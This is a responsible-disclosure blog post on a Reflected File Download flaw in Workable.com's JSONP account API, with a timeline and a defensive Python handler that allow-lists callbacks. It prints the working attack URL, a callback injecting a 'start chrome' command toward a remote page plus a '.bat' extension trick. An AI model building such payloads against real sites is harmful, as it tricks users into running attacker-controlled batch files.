For those who don’t know Workable.com…
Workable is affordable, usable hiring software. It replaces email and spreadsheets with an applicant tracking system that your team will actually enjoy using. From building a branded careers page, to posting ads to multiple job boards Workable makes it simple. Browse rich profiles of your candidates and work effectively with your hiring team on a platform that keeps your notes, communication, schedule, comments and analytics in one place. It’s everything you need to hire better.
I first noticed this Reflected File Download when auditing a private program at Cobalt.io.
When loading Workable.com I noticed an XHR request in Chrome's inspector:
workable.com/api/accounts/8012?origin=embed which returned the following information:
[code language="json"]
{"name":"Aesculap Healthcare","description":"","jobs":[]}
[/code]
Nothing unusual here, but when I added a “callback” parameter to the URL, its value was reflected in the response:
workable.com/api/accounts/8012?origin=embed&callback=dsopas
[code language="javascript"]
/**/dsopas({"name":"Aesculap Healthcare","description":"","jobs":[]});
[/code]
This reflection gave me the opportunity to launch an RFD attack with the following vector:
workable.com/api/accounts/8012?origin=embed&callback=||start chrome davidsopas.com/poc/malware.htm ||
[code language="javascript"]
/**/||start chrome davidsopas.com/poc/malware.htm ||({"name":"Aesculap Healthcare","description":"","jobs":[]});
[/code]
Now that I had my RFD vector reflected in the JSON, I needed the filename manipulation. Because the URL routing was permissive, I could simply append an extension to the requested resource name and get a batch file:
workable.com/api/accounts/8012.bat?origin=embed&callback=||start chrome davidsopas.com/poc/malware.htm ||
If you call the URL directly in Internet Explorer 8 and 9 you’ll get a file download prompt coming from workable.com.
On the latest versions of Google Chrome and Opera you need to force the download using the HTML5 download attribute.
So in the proof-of-concept I sent them I was able to open a new Chrome window with a page that simulated malware.
A malicious user could:
- Launch a malicious campaign with the specially crafted page, targeting Workable enterprise accounts
- The victim downloads the file thinking it comes from a trusted domain [workable.com]
- The malicious user gains control over the victim's machine
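Both halves of the bug above, the unrestricted callback reflection and the permissive URL that accepted `8012.bat`, are closed server-side. The following is an added example of a hardened JSONP handler, written for this post and not Workable's code; `build_jsonp_response` and its fixed `account.json` filename are my own assumptions, and the payload is constructed from the response shown above.

```python
import json
import re

# Allow-list: a plain JS identifier, optionally dotted (e.g. "app.cb"). Anything
# with spaces, pipes or quotes, such as the shell vector above, is rejected.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")
# The account id must be a bare integer, so "8012.bat" never reaches the handler.
ACCOUNT_ID_RE = re.compile(r"^\d+$")


def is_safe_callback(name):
    """True only for short, identifier-shaped callback names."""
    return bool(name) and len(name) <= 64 and CALLBACK_RE.match(name) is not None


def build_jsonp_response(account_id, payload, callback=None):
    """Return (status, headers, body) for the embed endpoint (hypothetical helper).

    Rejects non-numeric ids (filename manipulation) and unsafe callbacks
    (content reflection), the two ingredients an RFD needs.
    """
    if not ACCOUNT_ID_RE.match(account_id):
        return 404, {}, ""
    if callback is not None and not is_safe_callback(callback):
        err = json.dumps({"error": "invalid callback"})
        return 400, {"Content-Type": "application/json; charset=utf-8"}, err
    body = json.dumps(payload)
    headers = {
        # Stop the browser from sniffing the body into a different type.
        "X-Content-Type-Options": "nosniff",
        # A server-chosen filename so the URL cannot dictate a .bat name.
        "Content-Disposition": 'attachment; filename="account.json"',
    }
    if callback is None:
        headers["Content-Type"] = "application/json; charset=utf-8"
        return 200, headers, body
    headers["Content-Type"] = "application/javascript; charset=utf-8"
    return 200, headers, "/**/" + callback + "(" + body + ");"


if __name__ == "__main__":
    # Constructed payload mirroring the response shown in the post.
    sample = {"name": "Aesculap Healthcare", "description": "", "jobs": []}
    print(build_jsonp_response("8012", sample, "dsopas"))
    print(build_jsonp_response("8012.bat", sample, "dsopas")[0])  # 404
    print(build_jsonp_response("8012", sample, "||start chrome x ||")[0])  # 400
```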
Workable surprised me with a gift thanking me for the responsible disclosure.
Cool guys! 🙂
Timeline:
13-11-2015 Sent the security report to Workable
23-11-2015 Workable replied back with the information that they were fixing it
26-11-2015 Issue is fixed
01-12-2015 Full disclosure